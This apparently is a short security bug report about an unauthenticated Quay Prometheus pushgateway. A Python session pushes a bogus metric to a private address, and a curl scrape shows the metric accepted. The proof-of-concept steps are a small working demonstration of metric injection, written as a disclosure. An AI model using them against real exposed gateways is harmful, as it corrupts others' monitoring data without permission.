Undefined When Quay's pushgateway is exposed publicly, anyone can push to the Pushgateway port and then this bogus metric is visible in the list of metrics that can be scraped. One can show this by using the following script:
# python3 Python 3.7.3 (default, Jul 25 2020, 13:03:44) [GCC 8.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from prometheus_client import CollectorRegistry, Gauge, push_to_gateway >>> registry = CollectorRegistry() >>> g = Gauge('test_metric', 'Testing if pushing to pushgateway works without auth', registry=registry) >>> g.set_to_current_time() >>> push_to_gateway("172.24.10.40:9091", job='test-job', registry=registry) >>>
This is the outcome:
# curl 172.24.10.40:9091/metrics | grep test % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0push_failure_time_seconds{instance="",job="test-job"} 0 push_time_seconds{instance="",job="test-job"} 1.5971371222892244e+09 # HELP quay_security_scanning_unscanned_images_remaining number of images that are not scanned by the latest security scanner 100 645k 0 645k 0 0 63.0M 0 --:--:-- --:--:-- --:--:-- 63.0M # HELP test_metric Testing if pushing to pushgateway works without auth # TYPE test_metric gauge test_metric{instance="",job="test-job"} 1.5971370937285342e+09
Please check!
